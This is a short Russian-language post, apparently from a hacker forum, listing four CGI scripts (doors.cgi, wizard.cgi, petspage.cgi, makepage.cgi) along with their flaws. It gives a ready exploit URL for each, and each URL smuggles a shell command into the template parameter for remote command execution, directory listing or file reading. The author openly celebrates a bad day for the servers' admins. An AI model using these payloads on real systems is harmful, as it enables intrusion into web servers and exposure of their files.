Привет.

Настало время поведать вам о новых cgi скриптах. Сегодня у меня радостный день и не очень радостный для админов нескольких серверов. Вот что мне удалось узнать:

Название: doors.cgi
Описание: Скрипт создан для упрощения навигации по сайту.
Уязвимость: Позволяет исполнять команды на удаленном сервере.

Эксплоит: server.com/cgi-bin/doors.cgi?template=;ls|

Название: wizard.cgi
Описание: Это что-то вроде движка для сайта. Используется для облегчения жизни админов.
Уязвимость: Позволяет файлы и директории на диске жертвы.

Эксплоит: server.com/cgi-bin/wizard.cgi?template=;ls|

Следующие два скрипта я решил объеденить, т.к они созданы и используются для одних и
тех же нужд.

Название: petspage.cgi , makepage.cgi
Описание: Созданы скрипты для упрощения навигации по сайту
Уязвимость: Скрипты позволяют делать листинг директории и в некоторых случаях читать файлы.

Эксплоит: server.com/cgi-bin/makepage.cgi?template=/|&columnname=id
server.com/cgi-bin/petspage.cgi?template=;ls|

Конец.



Оставить мнение